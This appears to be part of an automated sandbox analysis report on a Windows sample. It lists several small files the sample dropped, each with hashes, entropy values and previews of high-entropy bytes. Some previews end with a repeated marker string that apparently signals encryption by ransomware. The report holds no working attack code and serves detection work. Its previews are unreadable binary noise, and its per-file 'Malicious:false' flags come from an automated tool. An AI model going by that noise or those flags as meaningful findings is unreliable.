              Preview:<?xml......ER....`...-...k.=I....~.v3D..#.i..-.f..x.......2../..f.K..r..7.Z...4p......g......pQ&.q..@.........2.9e<...}."T..08|^-.p.^.....^.....Ye.....u`.\q......Je.j..`..B.<...N..zj;.,....W.....i.E.5.#..8o~...A.,..J..._{.x.6.o._:7...`...cut..~..s%..,!e.......WS.?P.....Nd.....7.Ai]Y..L.#...PR$..P..I.... ..>.)W.|l.....pe8...7......d.,GM..k.....cZD.d.H.ne....r..b.....s.,....;./....D`.. .}.....F#....).e.&....F7.9_.;..I..$qj...........]./zN..8...{o..........t.v....P.......4...N$,4&............B..'8....[....K7....../..1yWy.....GK<......&......0.'.h...4....6.+&....aZ...(.j.V.4......._b......=....u..\...<..9..o&.~VX.3.n.8..&....h@......L../YA?.SF..I..E0.J.tJ......0.c..^...WM1..+[i...dv..L.....gtfyF6.1..[x.Mg.Ti....^C_M.!].~^b...... .('..+.:..[@..,Q.:..Pn..........O.*.c..L...L.)...z.?s.}...g.W.muv...MYR5.Z...I.)M..O..L,..A....A....D..Vf..1T..v..q$..P.R..$k.o;....#.t..":Z..g...W...o.....;.:....j5Z,..Z.Rc..j.....f.(...<do..../H...T.K.>
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1726
              Entropy (8bit):7.868329942774914
              Encrypted:false
              SSDEEP:24:lBhM2f8bUaYL5pvMyO2cF3CWzz03aDjVGaQpDP+Wl3mOaSZW8oGN3d+bD:pM+kUlpSzfMaDjWGWwOaS5/Nt8D
              MD5:38E3C0B0B4E1A4B1A53AA4A96400B02E
              SHA1:EB4CA7750E00E5A23AB70A9644D75DCE94E0F257
              SHA-256:A065C384B911FC08369A1434A7DEA7EDF4AE012ACBBA8F883983986D0A420500
              SHA-512:3A2DA9ED77EB5C8963B69981F3CDFBAAF138806D36AE1821D54A9FD5B721663CC0AACD6CE40BAF9D8BCEEB1511ED599B6EA85CF3AD617F78F71DF81E63FC21EF
              Malicious:false
              Preview:<?xml........'...N..0H..h.-.VAs.Nu|.wS..<.>.IE%+...8....](.}.R...A5.I..MI......qSQ..L{...9@..U.....LLq....5..8O'.Ih>mB..x...2....DR..~..V....(n.Vf.{:.{'.II...p....1G...4l.os-.......EmQ Ek<.....3D5.........>-.0V.6..O.C.@DJh....;..O0....s.@Y.W`V>....o..|.g....k.}.|....k..E/[.....X^.ud.......q-....LR....N:....e.;Jj....06L:..#...|,.P..:......C).x.f...-.?zV...!R..A.c|Z...N.s..<...6.vk6.0.-I...<..?..f..0....2.2K...."hj....~..[i1.:..o...nSk.M>...b.$..>3.k,@..........5..j.a..)...$..Mg.O%..H......a..V.V^:...5eS.g...:.n..I.J....H..@..=.j.5....n+D...{..o...n.t.T..[......%%}.."?...6G@.....^.'^..CJuSD?..VB..{,..l..L.F'?U...........]..J.J)Hc:})!..v...+6..R.....ym9F?..HQ."j.N..<M.......X#..e|.`......i{..RS.R..I.M.c..\6.c.o.M{............/.s.9..^.3...N...)/..<../.H.}.....M..."(........lQ...T..-..>.....C..!..k^...7..._..].1S..C.....R9l....&....:.*......S.6.._ew |0s..;.p....NH._B..2X..ra'.`?n.^.D..d....B4...B;Q....jV....s.+M..1.n.$8..d[nt.B....q..[%p..eD.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.8618494445010345
              Encrypted:false
              SSDEEP:48:0/qextPGXbjT5fI0U8hFgd2SCvYh/FwxckQ8D:0f7GXn42S1hF0J
              MD5:CE2F2982D19102DE54A829FF8B51F19E
              SHA1:71DB07E98D7BE65FBEA185DC4E87A141A47252AF
              SHA-256:6A7B6CC7BCD521E3BF7BF86DE3D5F2FF558F2C3CC2F2114A6C775063D985AC67
              SHA-512:E89B3C59F651A37AD8E9108AFB869E59A00D5E7E1047228CB1B7BA6359EDF7BF08DB8A79797967E3D7957B239DA7B626829B72E2A96429CED8D18E56682B68E6
              Malicious:false
              Preview:<?xml.M...."M.a/:CL../....;.yLd...j..:t.SR`.0......;..{...n.$...._...@^.1..6lQe.YF..L...+......16.k'|..Y..?.x..1.U...%..e2.....CyT...(.......f......<...9FV}.Ln=/.Zv8pN......P.b.HO..C.......^.. s...K....a..g2.9..Z.....g.Y..Fw.`......m.B{A..T....s..6......q^!....^jj...x=.......o....ii.5mQ.a.....*..9..9..I..TP...9%..4. ..hc6.Q.|...J...Hvx..F...*.2U.y.c...%...4V.3tB.;.....`.Vy....9.._......!...%...r..`*...,;...B...m..T.....Y.n(......S.A..:I......%..HK@t0.A.t.1[}...\..TST09.y...r..XO..1.!1...e...:..J.0.d.H.H..6d.iK..&-...../Z.......t+8...S...........I.`.M....b.[8..J-*.f.Z..v.........P.M~..8.......{..Y..m|b.wd..;..F.^G....B.:...j...Uj.3....p...Hn.....jv.i....s..;Z.?...(.x...O|.V.S.R...3uU._"u.WE"...)/.....L.....$..Z.H.U.S..u.T.D./(..)>.;ZF..=P..[.T..E..$..1.F..oJ...m....v....?.Tb.&x.B[k.&.Dy...pD..T..w8..J).j.......HYn....{R...........~)([t..0..&H!X...O.*...}.U.....?k7.=v.u..b.g......84y/.U...0\...}.W..n.c...g+..}.. ..k..Y.....q7-Z...Iz\j..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.88753255120006
              Encrypted:false
              SSDEEP:48:3K0UJaA8UYMLSd5+xATZJ/r0gOBInmQHgVZxpcxfO8D:4/YR4AoVInJgVZq3
              MD5:A1B7BFC8F7E63516BFC3AE5F80A2DD30
              SHA1:65DE1EB1FD3E2DB770EAA05AB1818BEE9F849F31
              SHA-256:01E1FB98D411E29C8CAAFF7B87E46EEA7E37209ACE17B1663D93F84229BAF892
              SHA-512:C40EFB79DCC2CC63454BB9698F83DAE6A73B0489BB8B51126FDAC4193381399DCE8DEDB689A20E4507F330046ED3803AE7E0C943298233E2CE53591BA69E65F6
              Malicious:false
              Preview:<?xml.S...;%T.g.....h....E.#M..j.q.Q<.k.o.G.T.r..'.U..EK..c.f4...9..C.qy..*.....(....2..G.7w."......`.EEc...W.}...@....).......i..O..',<..=_.U..=...2..."......|.,.u...f...VK....c........0..^T.."`....Q..".....d.L.g.":....Z...J?a.u..@+].s.\.#\.ZN.[(..f.w.VO..I.VF.8.!.H....g..3.TD......J..sL.Q.Q.....r;........Dn*.x..Q.y...5..m...js,..s..T...`..V.....;...r.e...uB..........5.....e..k$.w....?.T...l....xn.....b...........$Ai...[X.N_.i....Pt[......u..N.Mh5.P.st..*..xg.:..../c<j.6..a1eq.#_A\Y..DR.`.........X}J..9.TT8..c..9..o...-.Q..kn.)..OT..Q.......X=.P...^...*=.,.S..o..4..{dU....q8.n...\j.DC.S.....I,..DQ.......M*.a.P.r..-'.i.W....*....k.sxx....Rh.lx......!c<q;L}.=u'.!..z.......v,{........H.q.....+....p....]....."L..K-..\G.Q.RZ..^"....O...s..!9TSg.l^Ey.@.KY...!....$hp.-..6L....!...xwz.....Q..0..+L.O../..XH.".*.p$U..@.q@.NY...l..B1).O...(H.....;..<..}....d}...v.g;.3..ox}q9]....`.5.?..."U?."...vx.9..5..&.O..<5._...#...n)..0..x.v..o>...44.mL......pi.=K.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3225
              Entropy (8bit):7.943202750312432
              Encrypted:false
              SSDEEP:48:FtRttV13VqEEgkSwXntH5z6kQYQLoOi4B1lUHt4XCtEWb1aluf9SOg7t3TvBXm8D:JV1lqMjwXd5z2Ygi4B1lUNwCEW3Q9v
              MD5:79D5AFF1C6075AAA592DDAF559C19F55
              SHA1:FBB266386A560815106A7B09F0696504AF918F2B
              SHA-256:B05E32809B34797195277039F9311DC43E4168D59F52E341D0344D9E9A83D641
              SHA-512:757A8291553F1E7117B3B0243173520FCF50AB672A54992496C23C7AB2799158B9978A99AEC31122587E63339B99649D7426067805BB2114F1D8A514E414EF47
              Malicious:false
              Preview:<?xml|~6.&V.........t...'...q}Mb...N..yy.mt.S..G'{.%...}.e.y...#s8w..y,.w. 7bm..vF{[@.g.'d....r=bm...~........q.A.3....b.Z..4..U...O.*..ih.n.&C.`.."t....}......!S..6.N.n..qox.s.8..o^ .vgs.fe..A...s$p.El(I....P...;.F.u.c..........U`.....5...Kz.Lp........b...8!.".~....y.2&...a....hdQ.....D.A.}.@.....`...y..$.Z.....8.@..V... ..}...&..|b>F.|......o_....!.dQ!<.}nS....9..`....`.wP.Z{nIE..!...0..m.=R[..7.}.z.!..E.T.[..&V.Ie.f....X.>...`....VL3.bd.9;..P.dBw........R.<...T..F..([u..x.;j...f..........}1...y,.X1..P...8.(..u....r.{.*.]MxWphx...2....L...4HiL.g7W$.....1&......:..v..........=.C.I+.*.f.{qFM..(.I..).S0Ty.Nn....\.I..x.......7...........h...^.Y.......Ji....!.KN...g.0.y...)[Q..:....t.O....8.u....x....j...3p..zkW.s...iO.P..t..F.(].&.9)..k.+.xS...*..S..n.<F=.bG...d.JCv..........#.G.SQV.L..S.[.&6_..$.t....d..k.6D.T..nMn........C..c..m..E.....A..*mfN .....Q.Ev.... ...^=d3.....d.OV..#Jk.........>...x.._3ru0.;`.%.....A..Iq....ymi...... n
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):851
              Entropy (8bit):7.76413792001046
              Encrypted:false
              SSDEEP:24:54o08yqkO3OT8G5KwP+HrI3FQClwKVd+bD:0qcT2w2HrIFQswG8D
              MD5:5618897145EB30ECC1657E812EF27945
              SHA1:FAB4A226248D43F47345A1F6F42853435CFCA8E4
              SHA-256:CF76DD06307FCD2AF02750B847E265F22D3D7EB7C79EE1DCF54CB56D6F0BF6FF
              SHA-512:DC8A03CDDEC18895B72B164798C52EBEFA0CF6D36FA78C8A9CA86F2B375E1AA40DA8CE9BB57EA2D0B0512C4C9BDBD65AC364FBE24B6F6BCE80D753722EE6AAEC
              Malicious:false
              Preview:<?xml.yd+L.b...[..E.....E.Q.......i......$Lm.......q..e..jc..n.w..J...?r.:K..f.....I.*O%=}....V.."CD.o............L.ze^..gr.n..9..|...[.Sg....DB...7..+.3.2...bs.T........=...s`\.0u...|.B8...~.v...X...I.....G.......z.6$.8.?... ..dh..Mg}..=[..O....X...xZ..<.{=(<...#...'.x.a.,X....\^...Q......!.NrNRE..*?.T.. ........M..8.]..!5..C..{.K.6u..(.]...`4W]....zA..:n....0$4x.V.p.........Q..E...,..~s.#.?7.M...fT.H....3_.....~.....<..Q.T.r.D.-k./..=e.]e\}........J.,...(..'.....e.G$...=......U.n;.|5......T.2.h..?.Et..W.?E.L.t..4.r/^.n.........II).E.]f.. .....'.@5[&.....9.,w....`....[...$K....j..o..t.........L./.DF.!{.....e<..A.......< ....C`...D.>4..m._M..4.F)Ul.........7...x...<8...t.....g..&.'v.m....-.....CX...<.0p.x.)(d*....V3M...&....G.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1205
              Entropy (8bit):7.849180810274961
              Encrypted:false
              SSDEEP:24:WNwk1LnQSJHkors3Z3AHkln6eKCxdEmk8Be7/O4fftT8HSd+bD:Sj7JHkoowE0eJ8J7ff1WU8D
              MD5:56D456484D1C08F4A016850D240DBDE8
              SHA1:5AB10E330038F231E1DA233C687D2E2D6E8C5352
              SHA-256:30FE07B3A7C46D518A7AC1C7FE28AF399660A4EAE0AB99C2A4938B19A973D61E
              SHA-512:7D2266292390F3455955E63E3A405CD94D381207F55D57AE435CC9D4A39417E98AAB863D8A39C7EFE67155F231DDEE44C87B206791A5F406D7B684E223F1E25B
              Malicious:false
              Preview:<?xml..f.l.%...q..Drb..LNy.lX.Hx....p..U\...{..X.,"..5.*.....^..Z.`\F..L....9......d.o...2.LG;.q5.h.Q.U..l.8....=.....3..A;.....s.%..W./.Q.)Z.3).!kCA.....<W....I+....l......8..TU.M..w....c..;........Gi&..A.^...S.......}/..#e...Fm.r..3@^UIZ .......*.....4{X.zp.<b~..."4'i..[.D...[....U.8[UK..3F.......H...P.+.......$..G5.h.2..].st..p%............s .#^....z.a`.[.m...)]zH..:y..l....J.\..P...V.#....>...]...;....m)WN.!.>.Ci.-.x...E"0.)..2...'..`....&6...6..I...R^0&..zE.E..A.9.s.....).b..;Zj#..?j.`.Df8.}....x...v.S?.`OZV+......O..kK...b|....(,..u........T...-...:.H.V.u;.......2....5..r../<.......^4.?.{jdY...$..B....W..$...S.<.'G).)S5..4.b....Ux...8*.,.B6.{...j.;.q1/.x(.y.d......nD.Q...r....SD.zo.}..h...o[}gL/....L"...Vi(1._.G#......ws.w8 VN..2.>e...|..s>.fU...N..i3.n.,.Uc...>M*...+.N..P[-,Yw..sf&#.f....8dA....._...w..I.y~..p...R..b.........-.n.Sy...0...Q%}.eM..y.E.*.o..R.*....4.Y...t...Bi..a#.....s-s...X.....^..B.......4j.k.....4qX.V..\K; ~...p.6r":XY/(a
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1004
              Entropy (8bit):7.806203752710797
              Encrypted:false
              SSDEEP:24:muOqZXm4PGsgAo9tYwIfAxKMdnVQhnRF+QSEHk2Od+bD:vNNgA4RWAxPnmh7+NP8D
              MD5:1A0E20F3FE061444D7CFCFAB6AF5935C
              SHA1:B4F08E338D872BA5AFD178851E6F20941738D1C0
              SHA-256:84AA8A33673C7EDE7EDD62632EF7CD59D739B45FBF4A22E5527A82D029E16BEC
              SHA-512:819BC4872CC1CE80CA695D849D2B43ACE58EF73FE8366023C99F93E2D3A5BB629B9A73F64082ED716364811476AA57EB85372809552E1FFCA1DEB3A4E9682CD4
              Malicious:false
              Preview:<?xml...!z....A.Y.....aW....JN{..Z.g...Z[.!....<p...G...2.'vF...O..TM.M......YB.6u\u..IB.a..xW.............c.|...;u....y.:..-..^X..P9.. .@..b./..r.)jV.T]\.h..C...=....E,..c*SS~5...<.x.....(cTu.x(.xP.[.3....Kl?1..s.......8.Z..}....rE..........Lu....,....a.6.'.R1...rq..J..`..j.TR.F.j6!z.O.&..........a........40Z..H..C..1...GO[...`....0,.........d.FM.qv..C$.#.X.7.....G...R.C.e.nV.j.?.....B..WJ6.bm^N...1`.....K.....'K[.%z.]...Oo...`....`.Q.......|..'0........t.W.J~.t........u(&!..c...N+.U..]4m....;..Zg.|...`......|.{....6N......|...............P....w.4=..+D...#.t.......B..jFG....:w`..b....~..."...nE.Re|.x....n...{.gE..p.34>5..>k....].....O...v..@&.../..y."..I7..u.,.... .!....v...,.. :.38Uu...j.....f...1.87..T;]..i.T...U....OW...D.............9.D..i!......n....u..7O..k.WZ&T.1.b.....].io.......S;....:$.wH4D._Z.."...pZ;.)1...C.....bp...kpQ.k...u..=..iv......U...E......=*.R..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.875703558977585
              Encrypted:false
              SSDEEP:48:w+pDMExDx0aOMpbYejWj7srS9rOR82xJhP8D:w+px/mMpueS9Hv
              MD5:DD8FDB2327BAEA2F2FB45690D90FF432
              SHA1:ED5A0814375C93F4B476B7C258DACED939DD3D11
              SHA-256:EA929CC41B20C7D0721F2BB3C48E49FC6E808FA7CD781B8359F7C633BC72F97A
              SHA-512:50A8E3FA218CB64F1DF3537A665F7CC19D7E1C541992DD13E7C943707FEE026BE5C31777192AB7FF94EA85648CE985200A8CB12DDAD375953F37B16D7E8BC4C8
              Malicious:false
              Preview:<?xml ..y....6(.b..ASg.f....,R..WQ....NZB.t.\./..'...*....d..T..h.'bZ.9..V.w..Z...H...l...j.T?.l.jw#...=.4.'...{...F....K".b_.#...y......ip.3..[.......9........T...&JlsA....v^..}3.g.l..L8...Pud......,...UgtR.a........*....E.ng.....G.9.......+.X..d..1.).N.7..Q.`.l.....{F...w/jNdm...!.V.s....1..T./F...rl..T*..k.u...0.U......(.>..n.....k...m[!.qg.G..i&.38.-:....y@U.0...9.Z.]Cw.u..K.XS>.R...?...w...q..E..O<'.e\..!.f.T....!....F.}........!...rH..Y)v...Rn..9.|.%6.e.....QKi;..C..r..h.'..;.w.....F.I..V#....[.w|....b........Inp..M...(M.yJ..;..1....4F7...d.]L...X.z.n..q.n..5..TK.I.=X.$Ph_.....F6J.%..L._5.-.....hJ\...g..C*3u.....lF..H..t.j...q...... *..B.O.. X..qb..H:.!..O....UP........_Z.Ju.......%....K..3.FO....-.<.L.$.m...0~+2.T$Ga0.9l..W.p&.r...!.......u...C].lE<=...92......miQ.M.J.[..v.j?*.|8..Q.,.h...zBQ.....+...N8..^'xJE.....B...w .g.'B..*..E_..Cm.A.l.......n..8.dZ..'g.7Mq.v.qyU.. 0......_.^...4..*..r85:.{o..B.K3.Z.....6~.....;.z.C..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.896861744765783
              Encrypted:false
              SSDEEP:48:Xb09D4ktcE1125yQ+mo1wHDEjeXheHLr5Nbd28D:PkKGCH+m1HDEj0ErrHdv
              MD5:325E93388D779A304C07436CE14F6FAA
              SHA1:F35ED4D79A47E4FF970F49F082DA37944FCB2C8D
              SHA-256:501C46907BDB2AD5D075CDA523D5EEF92B1AE5A7F0CC264BFC5EE417ABFAD92F
              SHA-512:2399F5712F2F6930EF5FD010983A303EAA466C7CBB629D309E3E5338617CAD187B11F4E6E239CBE04714242AFD47EC442F5217EE71BE1340094EC32C6EA08334
              Malicious:false
              Preview:<?xml........X,..T%......;)5...-.).n..\.....o..J..[.:_.....=6.....]fL.H...OoT/Y!^{7?..n.E...e..R}._F....A.......'..`b^.....t....Rl.....p.........(..Rt...\...>..8.W.......Y>.....M.Ks&.......\........roj.G..$..V..-..7....Ad....=k..ZH[8.qBe......o.W.[..[.Z..e.......pX_....../...yM...#..P.@.....XyV...3p.....le"..[04!...:5.Y.e8...E.........1..T..P"|..........;F..|.'...n...ZcQ....p.`.-i&.@.Z......SP..z.....nHM-...35u#..Di...O=.7...L...3/..u([q.Tlu..h..1SnK....ndw...N?....F.)...0...Z.%...#. ..W../...J..;%..0....8.....4...3....EF.D.*........;b...k....:.?....%+....S..T...ZId.7X..V.L..a.i.s.9xG..g.laK.u+p.2.....R...C.j[.4.....N...t..v...9..Y.../..l=e?B T^O.cld,W...=h../eL..2....fx.l....Mj'.....p.x.'.....9.?.......;o\....X....5_..=.....x..ns....5...Z...Wb.V.~.".."..*....!.U`..L;.(.|.....'...t.2........P.I..H~n..*.^.0...U. '5.......5.69>l.^/......"..J.0.[....T&u...nH:M.....}^a.w.N...9...1.uQ..=...R.e..*......T.g...R..X.w.C..i.s.'
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):771
              Entropy (8bit):7.7419943336175105
              Encrypted:false
              SSDEEP:24:GiBV9KA2XXvkf6U38ZE1deg8NMoouoed+bD:G0V9KA2PqVRd3oouH8D
              MD5:C230D182B39408020FE6AE50C38F15A6
              SHA1:D47507781167CFFE4DED87690BCD24F47F2A5737
              SHA-256:234A903D840B20D89BB4561E2ACB70958A4CFC69436E9895A9853A6367962F2A
              SHA-512:64648C2421A0AA2A11045BA01277BA13A1EEBECD5A0BF060E647971B03B68E88A076A2D390E95DE93DB0C6291F97CD486CB08870C3375156FABBAE40448D5FEB
              Malicious:false
              Preview:<?xml........Nyr....i.7.(h....q....U.W..fb5.....+...Q.....*..3ph..#.q...........@....p...l...'{..I..m.....KN..L/tV.f..y.^...^..0.xi..}..M.|.>.Z.....T.y...S.....y...p.g..S7)$.$..I..+.+..?.`.=.N.ij.."......_..s...;.[...-L,..>I7.6...b.>...w..*?....&......R.5../'......M..I..x.s..-Z!..&......_.6......+H.[?:.).@*..m....I...h4wtf...w...4.=.O....rh...t5...9...&...y\..9.Ox..J........>.'..&.......7...$......?.Bu.u.,..C.x.......lUW.T2..Z#.1..z...FYQ.fiS.g..4x%.f1o....F..@Jm..;3..a.t...B.....:[.2..=5....-.F./0!.7l.7./Mk..H.}........O@.....].A.aMn71...N.{..X.'........L.#\.V.5..L..W......,..+s...........T....b\.X.n"....._u.....x...g3G/3.e.....0D..dO.V.j.L...(.U..,gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):774
              Entropy (8bit):7.747987976899795
              Encrypted:false
              SSDEEP:24:nC2dNDAyl4HQMoSBm71o64NHNRjmqLd+bD:nC2XDXlOQMDBmxoZtNRjme8D
              MD5:6FFFDFBCA2B89C0D35A0A341C2DFC4FE
              SHA1:D6C2F2619B4BC2C4C06C63A49855F6421F10E510
              SHA-256:48484CB55F09E6D09770DCF003AEEB68A3C71678E7EB4CEA2C08790C5F07A7A4
              SHA-512:7D08F5E797DEE7A34736B58C49893EB3961EFA6BF66DAC169501BF96D092E4A0952B3E95FC506F155C5F79F089F14CF9504FBCA247DCF72DC5873662BAB2780F
              Malicious:false
              Preview:<?xml...-v&2o..h.......u....../.#.,n..V....*...2....|..i.o.e..7o.9uQ...^j;.....iu.]Wix.o%..y.2....|.hy....O.\:w}....}..=......}bA.._..W....d..L.f....S.f............8.............0X.....N...DS.Oe....@....O1.....@..n....v.S..b....,.D4.n.Z..":g..K&....l..!|.(...N..*.{.."K....###".....#,.FN.O..R.lf..?Z./..i[o..\U.......;....Pk.8..`.&...MR5.;.I..8..x.3.g...+7.........Z.Un............q.`.......J..3....o..hA....s.`.ie..g....l..}....L....J..0.,r.#.5.!M.[G....]&L..s..s..fW..s. ..g..f.. ...v..c.;b'A.=[I.........6..6{..BIx.N..D.4a.4..q...5..,..r.5r6..S.8...C~....).&q....U.J.R..d.....2.+n..."bp.N.....3...Rua..(.+..+I..lB...r....'.....q.R...{.d-.w..#.-...z.w|j..d..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.886090319448012
              Encrypted:false
              SSDEEP:48:20P+SjUwNaNZ1pK01gYh8wiuD5YLHmoQ5Ea3CgsH9ApBNncdjvEX/OOLI8D:HFISaNZ10aglPuD5YLHUdZsCpBNncdjI
              MD5:1F85F0470494068BE17C04D4673B7100
              SHA1:7A5858B9E270FFBC7A53AFDBF7B70BD0DA8D1BFC
              SHA-256:77123BF4D9E6CA2728ACE0866D84C20A6E1BD4F6D92D12891A9298622770A566
              SHA-512:E536E9192F37E269E93C8479CDE1D5322DCFB56ACD6B25E822C3D460A7C4900923245B7C8EB3324F8E7FA2C948B0C0EEB710360EA54DB6AE43717C5B08C250A5
              Malicious:false
              Preview:<?xml^..7..x.9."......X..[.Tt.b..;.......l......3.D.M.?Er.h..%Q..].E.5...s..T.W.{...Q....,;..c..S..."..#.'v......=..v..vO....b*9T6.h..-Db..?S..BR.t..1.....g...~...7..>)s..<i........Nf"/.F..d.vz.........n...... .?...D\.e-..1....L.F...$./#...A...e..3.(y.W.>J U.g:~...A!..h.!d|4$.....^s..M.X,4Oz/.Z..O.).u.D\...S....4/[...?">...2#.te.....Es#....iM(.pb.mwl...h(..0...H.r..{g!....kxZ.....>~w7.f.`;..^.?D....h.J...&.N.{.B.f..Y.....k....<..WX.r......9................^.*^..^vE.I.+.kR.Id..7.U..T......3..-}.U.T.......A....D.Q...^.`..0...%.S.Rit...%..)..SHjN6K..K.*......:.N.|.a.;.D8.+..)/V.t.H.v.:1n=7..9M.a...!.l=...z.......P....O.......*..B".......W.......7D7.q.x.AYK(Mik.(...:.M...uy.s..]..!.x.*...g..py.4&.)p..l<.*-.."D.y.%.D.in=.....`H..g7o..'...l.L?y..D:;=hi.....|o.+d\.L...`.b.......f2.a.....)........-M.@.v.w...d..).....rg.+..J%@.$~.O.v''g7..7..k,.>..........6..._o..W..D....o.M.8AC...hyv..c..B..P*.92k!.Ro]..q....z..L...,n.%.8 e..T .,+x......X_....YyJ..;
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.892980437404541
              Encrypted:false
              SSDEEP:48:cjsJyBeq2eBAGrJRVhWkRv1quutcX4AR98D:cjnGeSGnVhWGveaXN0
              MD5:9F4319A91D46038ABDB33C57821DD23D
              SHA1:99A6B872ADE53E9E608A16F53B3C847F9B0A3B77
              SHA-256:7D18EEC923C7D1055ABEB3873E26B4362B91707407289282AF00C3813A5D59BC
              SHA-512:545435CFDCDE39DBCB847504ABCB6C80BD245F291049C482121547C2137196017FCDC4777A46EEE132061951F24D874D9440F0BE3E1D66AF72B0EFCCDC7E7795
              Malicious:false
              Preview:<?xml...}K..Y.;X6.8.Q.....i..j#..@r..9....Z.1{...|I..[..[.8.G..N.....v..#I..h...:.#k..C......2...b..:..L....`Z1....f....%...:.v4..Y>*..o..V.....k.....R..\d`.......R..[s..DSg.[I..m..b........z...u..........a.x.....B8.s.. ..R.....(.(..F...d..x.y/%^.o.!"E..TLHm......D....Elz7&`md.SO.b..O,9........j.Eg..R.I.5.\_..P...".. .!..p......].ufb.u.). '....W.......L....S......d^.!fk<.*.r.Fp.....(8A.q.......im.i.35#E...v.3..=......y.{.VK....v+o.K!m...S*.X~..@k.0..woP.>T.....C.]...\.".x... ..D..-.A..i..7en-...C......T4.G....a..I......>.iJe...1...o.r..7B..|.N..8...#.v....P"28{:*......9.mS...%.r+.T"G.?.+I$0i.Ay.#.PKF.....g....~.-...M..o....!{U...,`.#p_?....X..........g...".(.h...-..[V.S-.(Vt..yP.......2u.^b7........vf...^B.x.8+N...(a....w7MRM.;.Q....Q...Y.0.q...'..B....-r9zN..5...jV..G..C...M...W..qT...,.dL.#.=.....:[/........5...b.Xo.h3.?x....K..]..z..6.!.....H(.Q.R.J..%..AP.I.A..m..MkJ^.2y..(C./.,.p.j.#.M..5..%.CUr...<.....k?..h..y.........z.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):753
              Entropy (8bit):7.726483933149967
              Encrypted:false
              SSDEEP:12:OtZ7jkJQl2iNgg7yg9MyaOZQ0/pdEI13HFIN15bCOsyO9RrZdTEx8OwSLhIQ2Va1:OtZ77LbyDGQ0EI13m152OsF9RrjTehII
              MD5:F8C2A31E7689A78AC292E583C600E681
              SHA1:42F4BD4149C9CC7A9F4B1D64B2ED4BC0E0774B90
              SHA-256:909747B42E478CD40D4D34783BC37C20971031527436927BECC9106EF817A7C5
              SHA-512:D9309FF4FC24B54BC48F3FC448CD31ED21F80417B97CE98C3B21D523F8AA3B5390E3F005F142D7073C3AB134A443B1D5D3B315448551847B3A75F0120E197A8F
              Malicious:false
              Preview:<?xml..(.[/.+.j.{.*....YV[n.Nj.F ./..d..~.%z7......-....L.d.wG...........N2..5.?j..-5...~..M.....6..?F\.H].2.29E..C....o..a.......^....1 ,....e......cTQV.rQ.........B-.....Q.<r..v17.R...h^..fM...Rg.a.V`D.$.......b.<..E.[X U...^kT....p..pu.b..9.....?....f....'0.r..F4(@...l.y....m.J.g.\.].<o..a..tj...IE .....r.#.1a.6.....s..5}..)G.2.F{.E....;...H%...2...+.k5..{p...L.Z..#.&.`....2.'.=...~ak..g......y/?|........4.}C...qr.?.NL|x.!..\...snm.|.....)...*.G..d.......M..d..g................q..E....A...&..@.T`[...M...x`..!..TK;S>p...{j.~.d<..{YNB...}....H.1P9&z.<M.H. l.9h..:H.)K.{*.s=..q.......<C..TOa.I.i...._...{w..,.{..K6..;DT..r.g..Dz..|Z.+C.,..e.ygigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):773
              Entropy (8bit):7.7445531503054905
              Encrypted:false
              SSDEEP:24:1i9XrwaDmj2UYgPO7yma8nttbtjMqetO5cV8+d+bD:ksaCyUYx2makntsYcVj8D
              MD5:CBA707F9E6719060FF8E60E12B406F6B
              SHA1:9BEA7C26076DE6AF13C6421B77A0325D1295645C
              SHA-256:19573447C4B16BC5661B1BA4F8999B4BF2C443EDC7DC6715E330DDAF39377A98
              SHA-512:195AE91EA51190C883C7BB0D2C2E99EDDEA2CE6EC113E0631BF24F98115CCCE01423CE73E5E9096085CD193B25525554438365D239586373FA07BE1FD54543BF
              Malicious:false
